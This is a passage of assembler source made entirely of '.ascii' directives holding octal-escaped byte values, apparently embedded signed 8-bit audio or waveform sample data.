"\035\034\037\"!\034\032\035\034\024\016\015\015\011" .ascii "\004\002\002\002\003\005\004\005\011\016\016\013\013" .ascii "\017\017\012\004\003\002\376\372\367\364\362\363\364" .ascii "\362\357\364\370\370\365\366\372\373\367\366\367\367" .ascii "\367\370\370\366\370\373\001\000\377\002\010\010\004" .ascii "\002\003\000\374\367\363\357\350\346\343\335\333\335" .ascii "\336\333\331\334\341\341\341\344\347\350\351\355\356" .ascii "\357\361\365\372\372\375\004\012\016\017\024\031\033" .ascii "\034\036\036\033\034\034\032\023\020\022\020\014\013" .ascii "\014\017\020\017\021\024\025\026\031\027\024\025\030" .ascii "\025\021\016\017\020\015\012\014\014\014\015\014\012" .ascii "\010\012\013\010\003\002\003\002\374\372\373\374\374" .ascii "\374\377\000\002\010\013\013\012\016\023\017\012\011" .ascii "\013\010\002\375\373\366\363\360\355\347\345\345\342" .ascii "\335\330\331\332\327\322\322\324\324\324\326\330\333" .ascii "\340\347\354\357\366\001\010\012\015\024\032\032\031" .ascii "\033\034\032\031\027\025\021\021\021\017\012\011\014" .ascii "\015\011\007\010\011\007\005\003\002\000\000\000\375" .ascii "\373\374\001\000\375\375\001\003\001\376\377\376\373" .ascii "\372\367\363\360\360\357\352\347\351\354\353\351\353" .ascii "\360\363\363\364\365\366\364\366\364\362\361\365\370" .ascii "\367\364\370\373\374\372\374\375\376\375\371\010\001" .ascii "\360\001\357\335\010\360\000\012\325\373\0279*\362\015" .ascii "!\026\362\371\332\335\027\355\375\354\317\336\006$\025" .ascii "\366\002$\013\030\337\361 \006\025\003\000\351\366\373" .ascii "\360\372\341\333\365\003\376\315\273\326\330\325\342" .ascii "\371\325\344\336\353\011\002\361\355\007\376\376\326" .ascii "\343\015\017\024\377\007'\003\014\354\315\330\302\371" .ascii "\022\004\352\003!'@\"\020\033'\036\021\027\007\012\346" .ascii "\342\355\277\304\306\374\012\011\372\372$\011\011\352" .ascii "\011.0?5\"\025\003\0274\027\017\014\023\032\026\346" .ascii "\340\377\003\017\030\036\012\003\361\003\025\374\002" .ascii "\367\0255\037\000\005&\032+' J?A?%\021\006(2-\035\007" .ascii "\003'+\017/ ),\037\026\373\370\332\341\356\326\322\327" .ascii "\374\023\363\356\351\014\032!\023\370\373\344\373\006" .ascii "\003\373\366\012\036#\007\352\347\365\365\321\331\342" .ascii "\362\374\346\375\372\377\006%8\035\033\022&0\032\374" .ascii "\362\011\027\031\017\036#\022\030\027\004\367\337\352" .ascii "\006\005\346\311\314\324\343\305\301\311\330\337\314" .ascii "\337\322\313\320\321\353\340\322\330\372\014\361\352" .ascii "\344\370\012\021\024\033\031\017\011\365\363\350\322" .ascii "\350\005\012\357\323\325\317\320\263\260\300\313\332" .ascii "\322\343\333\335\364\013+) \037,4#\022\372\005\016\377" .ascii "\365\363\362\345\361\370\000\377\353\374\013\017\372" .ascii "\346\365\000\016\366\360\374\000\016\006\011\001\366" .ascii "\366\001\027\023\004\010 /'\025\012\037.*0*-\034\033" .ascii "\036 \035\002\020\032#\025\372\001\013\016\001\000\005" .ascii "\010\024\020\022\013\372\377\020/;2+9B0\031\004\024" .ascii "\025\021\014\002\014\372\364\373\373\367\346\371\006" .ascii "\002\354\303\266\270\303\304\313\326\344\361\353\363" .ascii "\356\337\340\347\002\010\375\367\007\037\032\022\020" .ascii "/CMQCF.\"$\032\017\373\000\010\015\377\341\343\345\351" .ascii "\340\327\333\336\342\333\335\330\313\307\315\350\360" .ascii "\344\332\346\370\362\352\340\360\376\376\004\376\001" .ascii "\367\362\372\365\362\345\350\370\377\362\336\333\332" .ascii "\335\325\313\323\334\341\335\343\343\324\310\311\337" .ascii "\337\325\322\334\361\362\363\364\012\".>:8, \"\030\020" .ascii "\372\361\371\364\343\310\304\315\333\334\335\356\363" .ascii "\365\360\365\371\362\365\000\034#\034\027\032+)$\035" .ascii "&34:30(\035$$!\022\015\033\"\027\373\365\374\006\001" .ascii "\377\010\007\012\004\007\013\003\004\014$-&$#0/*&,<" .ascii "CMMNB/0.&\017\001\006\010\370\335\325\331\343\343\342" .ascii "\354\355\356\351\345\334\307\277\302\327\345\350\353" .ascii "\357\002\010\006\005\016\034\035\036\034\034\020\005" .ascii "\017\030 \030\031*5.\025\014\010\014\012\003\004\375" .ascii "\371\365\363\363\351\351\356\376\005\374\362\357\373" .ascii "\373\364\361\366\001\000\376\372\367\353\335\342\352" .ascii "\357\344\335\345\351\342\323\316\320\331\337\340\344" .ascii "\340\340\337\340\346\341\337\342\361\373\364\352\352" .ascii "\367\374\370\362\367\377\370\362\354\346\335\323\335" .ascii "\350\360\356\360\375\004\005\373\365\366\372\374\367" .ascii "\366\354\343\334\330\336\332\331\340\366\011\007\377" .ascii "\000\016\024\023\024\036**+(#\033\022\030\035 \031\022" .ascii "\025\025\022\006\001\005\014\021\017\021\017\013\005" .ascii "\005\016\014\011\014\034)#\030\024\034\"!\"&-+-*$\034" .ascii "\024\031 \"\034\026\032\037!\031\023\030\033\033\022" .ascii "\015\010\376\363\356\365\363\356\357\374\010\005\374" .ascii "\367\375\376\371\361\351\345\336\337\342\341\341\336" .ascii "\351\365\374\371\360\363\370\372\360\352\362\374\003" .ascii "\002\012\021\023\025\033&%\037\034\"(\037\024\015\017" .ascii "\020\016\015\012\012\004\000\375\366\356\343\343\352" .ascii "\354\344\325\322\327\327\314\304\311\321\326\324\330" .ascii "\332\327\327\333\347\350\346\351\363\375\371\363\361" .ascii "\365\373\373\374\372\373\365\360\356\353\350\336\335" .ascii "\346\353\344\323\317\321\322\310\300\305\314\323\325" .ascii "\336\343\345\352\365\003\005\001\003\011\017\010\376" .ascii "\365\367\372\367\365\363\370\370\367\371\374\376\366" .ascii "\366\000\010\006\372\373\002\007\002\377\005\010\015" .ascii "\017\024\024\017\021\026\"#\037\037%/,$\035!('$ # \033" .ascii "\031\030\026\013\010\017\023\016\002\002\006\012\007" .ascii "\005\012\014\020\022\027\032\027\031" .ascii "!/4/,-3/#\026\024\030\024\015\006\006\001\373\372\371" .ascii "\365\351\344\350\344\330\305\300\302\304\303\307\321" .ascii "\330\341\347\361\367\367\371\377\013\023\021\017\023" .ascii "!'%\"(4750.&\035\033\026\017\001\373\001\001\371\353" .ascii "\350\354\354\350\343\345\346\351\347\350\352\346\345" .ascii "\343\353\361\354\347\347\362\365\361\353\356\366\367" .ascii "\367\366\366\361\354\360\362\357\344\340\350\354\350" .ascii "\333\330\333\337\337\333\334\340\345\345\346\350\345" .ascii "\343\341\347\354\350\344\345\360\365\363\362\371\003" .ascii "\005\006\010\010\001\371\373\372\365\351\341\345\351" .ascii "\347\335\333\341\352\360\360\364\370\377\003\007\015" .ascii "\015\017\021\034%!\036\037+/)&)0-,,+&\036\037 \035\024" .ascii "\014\017\022\022\011\004\006\013\017\013\013\014\017" .ascii "\020\022\027\026\024\025 )$\037 +0+'+33220*!\037\034" .ascii "\026\013\000\377\377\375\363\354\354\357\361\355\354" .ascii "\353\351\346\342\344\335\324\322\334\347\346\344\350" .ascii "\367\001\001\000\004\014\016\020\021\020\017\014\021" .ascii "\025\027\025\022\030\035\036\026\017\017\021\020\012" .ascii "\010\007\005\002\001\007\005\376\373\001\012\004\374" .ascii "\371\000\003\376\371\366\366\364\362\360\353\345\337" .ascii "\341\344\343\335\327\332\340\343\334\330\334\343\346" .ascii "\343\344\350\352\351\352\363\362\355\354\362\373\371" .ascii "\364\362\370\373\371\365\361\360\354\352\350\343\337" .ascii "\330\332\337\341\336\330\335\346\354\346\340\344\352" .ascii "\355\347\347\351\351\350\352\362\364\362\364\375\011" .ascii "\011\007\010\020\025\025\024\023\026\026\026\030\027" .ascii "\026\020\020\025\031\026\014\016\025\032\025\016\017" .ascii "\025\030\024\024\025\024\023\025\035\033\026\025\033" .ascii "#\037\031\027\033\037\034\031\026\030\030\026\026\025" .ascii "\025\017\016\022\027\026\015\017\026\034\030\021\021" .ascii "\024\024\017\015\014\006\003\003\010\005\376\372\376" .ascii "\005\001\371\362\363\363\355\345\334\333\331\326\327" .ascii "\327\332\331\333\343\352\354\347\352\363\373\372\370" .ascii "\375\004\011\014\022\030\030\032\036'( \034\035$!\030" .ascii "\021\020\023\021\013\004\003\001\375\373\367\365\355" .ascii "\351\354\355\351\336\334\341\343\335\330\332\335\336" .ascii "\336\341\345\343\344\346\357\362\356\355\357\370\372" .ascii "\367\362\362\370\370\366\360\360\357\355\355\354\354" .ascii "\344\341\347\352\345\332\330\335\337\332\323\325\330" .ascii "\333\333\336\343\343\346\351\361\365\362\360\362\370" .ascii "\372\366\361\360\366\367\365\364\366\370\366\373\376" .ascii "\000\372\371\000\007\005\376\377\013\020\022\016\024" .ascii "\026\034\035\037!\035\035\034\"\037\035\026\033\033" .ascii "!\023\027\004\013\374\371\033\360\344\335\362\022\362" .ascii "/G\377\034\352\340\335\350\013\003!)\347\333;!\004-" .ascii "<@\374\015\025\263\313\272\340C\002\357\021\014\036" .ascii "\327\334\334\342\021$$\002\025\361\364\334\320\310\340" .ascii "\325\273\316\266\306\311\304\313\344\333\343\362\327" .ascii "\343\014\347\300\317\267\277\276\260\330\312\337\371" .ascii "\343\342\341\347\337\305\311\352\335\361\365\336\352" .ascii "\007\024\012-=821JZT^>%H\022\371\001\006\026\023)\031" .ascii "6=!*\026-OP^.\0350\027'\004\351\015\005\362\350\335" .ascii "\352\375\366\373\0201'\035\377\366\024\367\356\326\324" .ascii "\344\374\342\334\357\345\367\364\354\361\032\034!\370" .ascii "\336\377\352\360\334\326\353\330\360\356\000;E>0?ID" .ascii "7\033\030\034\024\004\015\004 \022\377\031\0218,;\024" .ascii "\007+\017 \016\000))\032\033\377\010\372\003\003\334" .ascii "\003\023\013 \021*@\033#:U4%)\002\013\372\340\333\322" .ascii "\341\375\344\347\001\363\364\360\344\276\325\317\275" .ascii "\271\236\275\260\232\246\270\307\323\307\336\353\351" .ascii "\370\344\342\376\355\346\346\307\342\360\345\315\347" .ascii "\367\001\030\035(\032\"\"\006\365\021\026\010\016\032" .ascii "\011\015\004\340\354\357\377$\016\0200*.#*MUQ<&9+ !" .ascii "\012\021\025\032\000\360\361\347\355\343\353\370\372" .ascii "\362\344\321\327\352\331\324\345\353\370\001\354\373" .ascii "\032\004\365\356\353\015\005\365\341\330\371\345\345" .ascii "\356\333\367\001\366\376\010\013\376\021\022\000$\025" .ascii "\006\375\353\362\376\372\371\002\015*(#6M@D45ZSJOBJ" .ascii "A25(I;-%\037%4\"\016\036\036\022\011\016\354\360\343" .ascii "\320\324\326\354\377\374\001\035#\033\034\003\004\"" .ascii "\372\363\363\341\361\364\353\354\003\025\030\034!\035" .ascii "&%\006\371\365\337\342\331\314\304\315\310\264\315\323" .ascii "\330\321\310\324\337\360\370\331\323\347\354\327\325" .ascii "\320\304\327\331\310\321\341\351\364\335\353\367\373" .ascii "\376\370\003\003\365\362\343\355\376\361\360\366\373" .ascii "\367\010\006\367\000$.4-$*\037\012\361\351\354\375\367" .ascii "\352\007\017\0243\037(HDC4-5\033\007\363\341\347\330" .ascii "\327\324\311\351\370\355\372\014\034\027 \017\003\031" .ascii "\025\000\347\346\377\373\355\364\360\371\002\010\357" .ascii "\371\015\377\005\373\367\005\350\331\340\330\361\352" .ascii "\341\332\331\366\000\377\010\013\033*\026\007\020 \017" .ascii "\007\363\373\020\020\016\010\021\031%\022\"?H@CC5D'" .ascii "\017\014\003\020\017\366\362\375\014\023\010\025(:;" .ascii "\"\031\014\372\374\364\346\353\002\000\377\014\021\025" .ascii "\031\032 4<5\034\"..\035\016\022\0341'\023\033\033\025" .ascii "\"\017\017!\034\031\015\006\377\370\365\341\331\334" .ascii "\326\312\300\307\316\325\326\307\321\346\350\340\320" .ascii "\306\312\313\272\265\270\275\303\271\252\270\305\311" .ascii "\317\306\333\371\346\347\350\333\345\341\341\323\315" .ascii "\320\312\312\313\315\344\363\350\335\345\364\364\356" .ascii "\327\327\351\354\337\331\354\001\000\365\373\377\016" .ascii "!\030\016$/\"\030\021\012\022\016\006\015\004\021\015" .ascii "\005\016\020%)-,7GM>'5=2!\033\035!\036\014\003\0211" .ascii "1)05>=:1,6 \022\031\005\031\016\363\001\004\034\031" .ascii "\020\021\025($\013\015\020\017\017\372\346\351\376\367" .ascii "\353\366\377\021\027\020\023\023\024\012\373\364\365" .ascii "\370\345\322\322\312\330\322\307\325\317\327\333\316" .ascii "\303\306\311\315\310\314\324\332\340\310\310\335\337" .ascii "\336\350\351\362\001\016\016\022%'-&<G;5#\034\031\037" .ascii "\016\006\022\012\014\031\002\014\035\024\031\010\002" .ascii "\011\010\375\366\352\357\356\363\356\345\372\376\374" .ascii "\370\011\013\015\024\015\025\033\027\011\372\374\002" .ascii "\370\364\366\371\374\007\006\374\010\015\001\377\372" .ascii "\364\373\367\356\352\334\332\326\313\323\320\326\331" .ascii "\326\336\343\364\376\373\373\000\015\000\362\355\352" .ascii "\355\341\341\326\330\344\336\322\330\341\334\341\345" .ascii "\345\344\350\344\345\351\330\336\344\331\346\352\374" .ascii "\002\374\005\011\031\025\012\016\017\021\014\377\373" .ascii "\372\003\003\375\376\001\005\012\011\006\015\014\022" .ascii "\024\017\013\013\007\004\004\370\003\375\367\014\011" .ascii "\017\027\020\031&)0).74:0,33+'\036\032\" \014\024\032" .ascii "\027\033\026\034\025\006\000\367\356\353\344\334\316" .ascii "\327\335\342\366\363\000\025\023\037\037\032(\" \036" .ascii "\030!#$(#289=ED65.%\037\024\011\375\373\376\362\361" .ascii "\350\352\355\356\357\352\367\371\364\000\365\351\364" .ascii "\343\336\333\322\330\330\326\327\325\335\331\333\341" .ascii "\342\345\341\337\333\337\334\320\311\305\307\314\304" .ascii "\304\300\276\310\310\314\320\332\336\332\343\333\326" .ascii "\332\317\323\312\302\310\311\310\316\320\327\341\335" .ascii "\351\361\362\352\343\344\344\342\334\327\320\314\326" .ascii "\323\307\324\331\337\343\356\375\004\013\020\024\021" .ascii "\025\027\023\032\034\021\025\025\021\035\035\033-!'" .ascii "4/3'),,'\031\032\031\026\025\020\023\025 %%,27014//" .ascii ".1+)+''102<3<CAE7/.+#\032\016\015\010\003\376\371\005" .ascii "\006\006\005\012\005\376\001\370\356\347\346\342\343" .ascii "\344\345\341\346\357\366\373\375\003\004\007\013\015" .ascii "\023\022\011\024\022\020\022\014\022\021\016\014\014" .ascii "\013\012\014\011\004\004\002\373\376\373\371\356\352" .ascii "\352\353\345\333\332\331\333\331\336\331\333\332\331" .ascii "\330\332\327\316\326\320\321\315\277\311\312\305\311" .ascii "\307\317\323\326\333\332\337\331\332\342\345\337\333" .ascii "\326\327\330\331\326\317\332\335\336\341\337\342\334" .ascii "\332\337\332\327\327\332\325\324\325\320\334\335\335" .ascii "\346\336\345\353\347\353\355\356\355\354\360\366\373" .ascii "\370\362\371\001\002\000\006" .ascii "\016\017\026\033\031\037 \037\"&*#\"%#!\036\"! $\036" .ascii "%)\"*.(/,*4.**&(*(&#**)*,*',.-(()%!\"\037$)*$$)!&&\036" .ascii " \032\026\035\023\016\011\001\004\003\376\370\366\362" .ascii "\351\346\342\335\340\342\345\345\346\346\344\347\355" .ascii "\355\351\354\365\373\377\003\002\007\015\020\034\035" .ascii "\" \037%\035\032\026\020\017\015\007\006\002\376\374" .ascii "\373\366\365\370\356\355\360\347\337\331\332\331\327" .ascii "\324\320\316\323\323\316\315\320\324\325\333\340\337" .ascii "\334\336\340\340\340\335\332\343\340\332\340\334\336" .ascii "\336\331\333\335\333\335\334\334\331\331\324\321\330" .ascii "\327\323\315\315\321\314\316\322\321\324\327\337\341" .ascii "\343\346\346\351\353\351\345\343\346\346\341\343\337" .ascii "\345\353\346\354\363\360\367\370\373\003\001\377\002" .ascii "\007\011\007\004\010\013\021\023\025\032\037 %(,#'&" .ascii "*%)&)**($+%- '\025@\023*\373\003-\360=0\025\367\023" .ascii "\020\003\341 4\024\012#94o\0373'\376\016\333%D\352\342" .ascii "\316\332\025\022$'\342\333\330\312\327\324\352\312\365" .ascii "\351\321\315\316\372\304\004\"\004(3E\037\022.&=;A\026" .ascii "\024\025\012\007\014\016\367\"\334\345\356\350\323\314" .ascii "\345\363\361\314\364\357\334\341\357\360\021\0343*\022" .ascii "4(!&)/\025*.\004\012\006\377\345\344\363\326\334\347" .ascii "\277\344\312\240\274\236\225\301\344\265\307\345\336" .ascii "\326\330\325\342\353\004\007\004\024\007\006\027\023" .ascii "\003+\02215\034\005\017\016\363\357\373\374\347\361" .ascii "\347\332\300\341\310\303\273\272\305\273\260\253\305" .ascii "\306\323\335\000\363\375\007\001\033\016+ 4A(`>*?B>" .ascii ";>?93,\031\031\004\000\372\010\002\004\005\354\331\362" .ascii "\350\312\011\342\342\365\372\006\002\000\366\003\022" .ascii "\022\034\"\034*\035\033!\021\033B14.D5\037#\034\036" .ascii "\024$\025\022\012\004\010\375\364\376\352\364\353\351" .ascii "\363\275\314\316\273\330\307\307\312\316\317\307\313" .ascii "\311\331\334\353\354\000\014\366\376\375\004&('(FF0" .ascii "M:\037/;1--'\"\036\023\003\367\353\372\371\357\365\347" .ascii "\355\301\323\342\305\316\316\341\311\310\324\323\324" .ascii "\331\332\352\357\357\372\006\370\365\030\006\020\011" .ascii "&6\017$0%\031\030\027\015\024\026\013\002\364\352\341" .ascii "\333\344\315\305\352\305\315\302\271\312\277\266\260" .ascii "\320\276\317\320\323\325\321\325\344\362\362\000\001" .ascii "\006\012\374\011\035\0325\026\027\036#\026\036*\033" .ascii "0\"+\027\"\026\020\012\003\006\001\001\361\010\363\354" .ascii "\355\356\372\365\356\013\004\371\013\375\021\007\005" .ascii "\010\025\026\030%#\037\030\037\031\027\014,!\034\021" .ascii "\025\036\033!\016,\033\027.*%\030\013\025\030\032\"" .ascii "\032\026\026\011\013\365\367\377\355\361\347\361\363" .ascii "\342\313\266\262\301\307\320\314\274\271\275\274\304" .ascii "\305\314\320\340\360\355\363\005\001\014!\006-=S7UI" .ascii "/H)I>KAA6)\035\025\010\001\000\373\373\357\352\345\331" .ascii "\314\327\322\312\317\347\336\325\304\313\277\315\336" .ascii "\356\357\353\005\363\375\366\376\376\017\015\022\"\037" .ascii "\037\005\376\006\015\036\013\001\022\006\013\377\357" .ascii "\370\364\356\375\374\375\363\350\350\341\336\336\340" .ascii "\346\345\343\357\337\312\322\323\316\343\346\347\313" .ascii "\320\310\317\330\305\335\305\330\343\340\350\337\346" .ascii "\346\352\370\376\013\032\027\027\027%#(80CBDGB@8;2H" .ascii "FA<:3\036\032\016\015\012\010\004\375\363\353\352\344" .ascii "\323\336\342\340\347\357\367\337\350\364\341\351\363" .ascii "\006\007\017\026\030\"\025\035\"0.5/3&\031#\015\035" .ascii "\033%\022\027\025\372\370\370\012\364\366\360\361\363" .ascii "\356\352\347\336\337\344\344\354\356\357\355\363\350" .ascii "\346\360\347\357\377\371\366\362\003\363\336\341\365" .ascii "\004\011\377\375\003\366\357\347\363\372\365\376\003" .ascii "\004\007\375\006\003\013\015 \0340/\032%\026\026\025" .ascii "\037\035$\023\037\023\033\037\013\377\363\371\374\007" .ascii "\373\362\342\342\332\340\337\336\342\337\332\335\315" .ascii "\324\331\321\350\330\341\371\363\331\355\361\343\343" .ascii "\342\375\361\336\334\350\336\333\352\333\342\345\342" .ascii "\344\342\336\327\326\340\344\344\343\357\005\004\377" .ascii "\371\374\036\023\023+%8)0/)/*1==*,# \032\017\016\022" .ascii "\017\012\005\005\373\351\355\361\365\355\347\366\367" .ascii "\364\347\356\362\350\360\363\376\373\011\373\377\021" .ascii "\011\007\007\023\024!\026\023\024\024\016\022\023\031" .ascii "\034\027!\037\036\014\012\015 \014\020\032\031\023\013" .ascii "\022\012\024\003\013\010\011\377\370\003\372\366\361" .ascii "\352\354\362\352\344\333\334\327\320\321\317\326\333" .ascii "\324\334\335\321\335\342\346\347\362\372\351\367\374" .ascii "\364\374\002\377\006\030\023\021\036\032\022\033\033" .ascii "\032\030\033\037\035\031\025\024\022\012\017\007\012" .ascii "\016\377\005\376\374\366\363\366\377\375\000\006\005" .ascii "\373\371\010\000\015\013\005\012\023\011\377\014\005" .ascii "\003\005\000\004\002\373\367\363\357\347\346\341\342" .ascii "\326\332\333\326\321\311\304\301\303\276\306\313\315" .ascii "\311\314\303\313\314\325\352\346\341\337\354\357\357" .ascii "\361\371\372\004\014\020\020\021\023\025\026\026\032" .ascii "\033\037\035&\"\"$\036\034-.\036,/ &&#*(*\"-+,*!*\033" .ascii "\027\027\031\025\024\015\010\004\377\375\370\366\362" .ascii "\371\353\356\352\341\356\350\346\364\365\366\363\361" .ascii "\372\355\371\000\360\367\012\376\376\010\374\003\013" .ascii "\005\010\001\003\005\377\001\370\366\364\362\356\354" .ascii "\351\351\350\351\346\342\341\355\363\370\362\362\000" .ascii "\374\377\001\007\024#%1(\"#*31),6,*#& \030\020\020\014" .ascii "\006\003\374\371\365\357\351\347\345\345\346\336\345" .ascii "\344\344\345\331\350\337\333\340\344\355\342\355\363" .ascii "\350\363\360\350\355\361\353\356\372\352\356\364\364" .ascii "\361\363\370\360\365\361\364\365\362\367\370\373\372" .ascii "\375\372\373\377\376\002\376\000\006\014\014\004\004" .ascii "\003\006\007\375\003\001\375\007\370\364\363\357\366" .ascii "\355\355\366\365\364\356\362\371\362\353\364\376\377" .ascii "\374\374\000\002\003\005\006\012\014\013\017\022\022" .ascii "\017\020\026\016\025\015\013\013\007\020\005\002\377" .ascii "\372\373\376\001\013\376\364\374\373\370\365\364\373" .ascii "\374\377\376\370\002\000\007\010\013\024\025\025\032" .ascii "\035\037\037\"%)$!&##!\036\027\026\021\026\014\025\014" .ascii "\006\012\002\376\370\373\355\366\352\342\352\352\344" .ascii "\337\345\353\353\361\346\357\365\360\362\362\372\374" .ascii "\377\376\004\005\007\005\007\007\010\007\011\007\010" .ascii "\006\002\001\001\374\365\374\371\370\366\375\374\366" .ascii "\365\362\367\363\370\002\372\371\376\370\373\367\372" .ascii "\371\366\374\371\374\001\373\363\366\364\366\370\365" .ascii "\370\370\367\366\372\374\371\372\376\001\001\377\376" .ascii "\002\003\007\012\013\014\013\013\021\023\020\014\017" .ascii "\020\007\012\005\003\011\003\376\370\363\376\352\353" .ascii "\356\354\346\334\343\345\340\333\340\340\343\336\344" .ascii "\343\353\353\354\361\363\371\373\377\002\006\006\010" .ascii "\013\014\015\020\012\020\016\016\017\012\011\012\010" .ascii "\012\010\005\001\004\003\000\003\365\372\370\367\376" .ascii "\376\376\001\000\005\376\007\013\005\015\006\013\012" .ascii "\016\017\023\022\025\026\023\026\026\027\026\026\026" .ascii "\026\024\025\025\024\022\021\022\017\020\012\013\021" .ascii "\005\012\012\003\006\015\012\004\376\002\377\374\375" .ascii "\366\364\354\360\357\355\357\361\355\365\352\352\365" .ascii "\355\363\360\362\365\372\372\372\374\001\007\006\007" .ascii "\010\014\014\015\017\016\020\020\020\020\020\017\015" .ascii "\015\016\011\010\007\003\011\375\377\376\372\373\370" .ascii "\361\351\357\356\353\351\353\341\342\350\342\344\351" .ascii "\344\345\345\350\354\351\357\364\362\371\365\366\372" .ascii "\365\000\374\367\374\373\001\002\007\001\005\004\006" .ascii "\005\003\006\003\014\375\007\365\372\363\000\366\003" .ascii "-\376\011\375\023\001\377\035?ONg,&2#\017\007\373\337" .ascii "\377\372\362\007\352\000\014\027\376\013&\006\003\003" .ascii "\004\352\000\301\313\324\311\346\326\323\330\005\346" .ascii "\367\373\012\006\361\334\335\335\322\356\276\263\300" .ascii "\353\317\332\377\351\004\367\327\371\376\005\030\345" .ascii "\003\003\353\346\266\261\255\276\300\262\315\351\370" .ascii "\374\014\022+NG\037\017 \"\016\370\001\002\355\340\341" .ascii "\316\324\362\360\360\017&1/\366\006\000\377\015" .ascii "\365\026\015\011\006\371\002\036\037#)\036),\036\005" .ascii "\025\034\024\027\013\015\026\034\032\011\0161*(06AB" .ascii "5\026+.\024\023\011\377\014\007\003\370\005'\037\035" .ascii "\035 6EBGE6.\033\003\002\000\357\343\332\341\363\373" .ascii "\370\362\366\007\011\373\371\374\357\322\265\241\253" .ascii "\312\311\313\336\341\376\011\371\371\376\003\372\351" .ascii "\355\370\371\365\334\347\371\003\027$(-<-\035\030\036" .ascii "\037\022\377\371\367\372\362\345\331\327\342\323\322" .ascii "\325\335\374\366\356\372\365\377\377\362\366\364\367" .ascii "\356\325\341\352\347\346\337\346\364\374\364\370\001" .ascii "\003\013\006\363\364\002\002\367\347\342\340\335\337" .ascii "\334\344\373\024\020\004\014\023\015\371\341\341\357" .ascii "\357\343\334\342\357\370\000\012\037;88,(8-\026\377" .ascii "\374\365\342\320\275\300\322\335\345\347\366\015\012" .ascii "\010\006\021&( \013\017\025\016\000\362\364\003\376" .ascii "\366\364\377\023\022\020\016\032)&\026\016\016\022\016" .ascii "\371\354\356\371\372\364\366\006\024\025\024\020\034" .ascii ",%\025\016\023\032\013\372\365\376\007\000\377\005 " .ascii "9>638>0\030\017\005\007\363\332\324\331\332\335\333" .ascii "\342\363\001\007\373\371\357\353\341\326\331\350\361" .ascii "\357\347\343\362\375\367\357\365\005\027\026\022\034" .ascii ")52+2=D7\"\032\027\024\012\374\377\016\024\015\010\013" .ascii "\024\033\017\374\372\376\367\354\331\330\345\350\341" .ascii "\331\343\365\000\374\362\374\011\016\000\362\362\365" .ascii "\361\334\311\316\327\327\325\311\326\354\360\360\361" .ascii "\373\012\013\366\352\347\353\351\336\323\327\347\350" .ascii "\333\320\323\341\345\333\331\346\364\371\363\355\370" .ascii "\006\005\376\365\370\377\370\353\344\352\365\363\347" .ascii "\341\347\362\357\346\342\355\367\370\353\340\352\365" .ascii "\366\362\366\007\031\034\031\026\"-'\032\020\023\025" .ascii "\012\367\355\370\001\376\367\372\010\026\034\026\034" .ascii ")/,\035\025\032\035\024\005\002\006\020\016\006\007" .ascii "\030()##170\"\034\"'\035\025\030$* \024\024\035$\036" .ascii "\022\024\034\037\023\003\377\004\005\373\355\353\357" .ascii "\355\337\312\306\322\337\343\346\365\012\024\020\005" .ascii "\005\015\014\377\360\361\375\002\375\373\007\036047" .ascii "FSP>.$!\032\006\365\362\366\366\351\345\357\374\001" .ascii "\367\364\371\011\011\372\356\356\356\354\333\312\315" .ascii "\325\326\315\310\327\351\357\354\351\363\376\376\361" .ascii "\345\350\353\344\325\314\320\332\332\323\322\335\351" .ascii "\354\347\350\363\000\000\364\353\355\355\340\312\273" .ascii "\274\304\302\272\275\317\347\361\363\373\015\035\034" .ascii "\016\005\005\004\364\342\327\326\331\322\313\315\332" .ascii "\355\366\364\376\016\031\030\013\010\016\017\012\374" .ascii "\364\372\002\001\370\374\013\034\037\030\031'2(\033" .ascii "\030\037 \023\004\001\005\015\011\001\010\027'%\036" .ascii ")691!\037\" \024\003\000\010\015\007\000\010\031%$$" .ascii "-?HB9892\037\015\011\012\010\374\365\372\007\015\011" .ascii "\007\016\030\032\016\377\365\356\341\312\273\272\304" .ascii "\316\317\321\337\365\002\005\007\022\036\"\032\024\031" .ascii "\035\034\022\015\030#'&\")31)$%(\"\024\010\006\003\371" .ascii "\351\340\335\336\342\331\327\341\354\363\357\356\366" .ascii "\373\373\361\354\352\353\351\332\326\331\336\340\331" .ascii "\331\346\355\356\354\357\366\373\372\357\354\351\351" .ascii "\342\325\315\316\322\322\317\322\336\350\354\352\353" .ascii "\360\362\354\342\335\336\336\331\322\322\333\343\346" .ascii "\347\355\371\001\001\375\375\001\001\372\356\347\345" .ascii "\342\334\325\325\333\340\346\347\357\373\004\012\014" .ascii "\023\033\036\035\031\026\030\026\017\011\006\012\015" .ascii "\012\010\016\027\035\035\034!&(\"\034\030\027\025\015" .ascii "\006\003\006\011\006\007\014\020\027\031\032\036$& " .ascii "\034\032\033\030\020\014\016\025\026\024\031 .20/.1" .ascii "*!\027\023\016\006\374\364\361\360\361\356\356\357\363" .ascii "\362\354\347\343\343\337\333\332\336\344\347\346\347" .ascii "\355\365\371\372\376\007\021\026\031\035%,//022-&\036" .ascii "\031\025\020\013\010\010\012\012\010\007\010\011\005" .ascii "\376\373\371\367\363\354\347\350\353\351\345\347\354" .ascii "\360\362\360\362\367\372\371\366\362\362\357\352\347" .ascii "\342\340\341\337\336\341\346\353\353\357\361\362\366" .ascii "\362\356\356\354\354\353\346\345\346\347\345\341\343" .ascii "\344\346\347\347\351\356\361\361\361\363\363\363\361" .ascii "\355\355\352\351\346\343\344\347\346\346\351\354\361" .ascii "\365\366\367\372\375\001\377\375\000\004\007\011\010" .ascii "\014\022\030\031\031\036 \037\034\032\031\025\021\015" .ascii "\015\014\013\011\012\014\017\021\023\025\030\033\034" .ascii "\032\030\027\026\025\020\014\013\014\014\013\012\015" .ascii "\022\025\025\026\032\034\034\033\032\032\032\032\027" .ascii "\026\026\024\021\015\014\014\012\012\010\007\007\006" .ascii "\006\000\373\372\367\364\356\346\343\335\326\321\313" .ascii "\315\317\324\330\334\344\353\357\363\365\371\374\372" .ascii "\373\375\376\001\005\007\015\025\034\"%),.+&!\034\026" .ascii "\021\012\002\001\377\374\371\367\370\370\371\371\367" .ascii "\372\372\370\365\361\360\355\350\345\343\343\341\340" .ascii "\340\343\347\352\354\356\361\364\365\366\364\362\362" .ascii "\361\357\353\351\351\352\351\350\350\353\356\360\361" .ascii "\364\366\370\367\365\363\362\355\350\345\342\341\337" .ascii "\336\337\343\350\353\360\363\370\373\374\374\372\370" .ascii "\366\364\360\354\351\351\352\353\355\361\367\374\001" .ascii "\006\013\020\023\025\025\026\026\025\023\023\024\024" .ascii "\024\023\026\031\035\036\037\"$%&%#! \036\033\030\025" .ascii "\026\026\025\026\031\032\033\034\035\036 \037\033\033" .ascii "\030\027\023\021\020\017\017\015\015\017\023\026\032" .ascii "\034\037#%&%#\036\035\031\023\016\012\007\005\002\000" .ascii 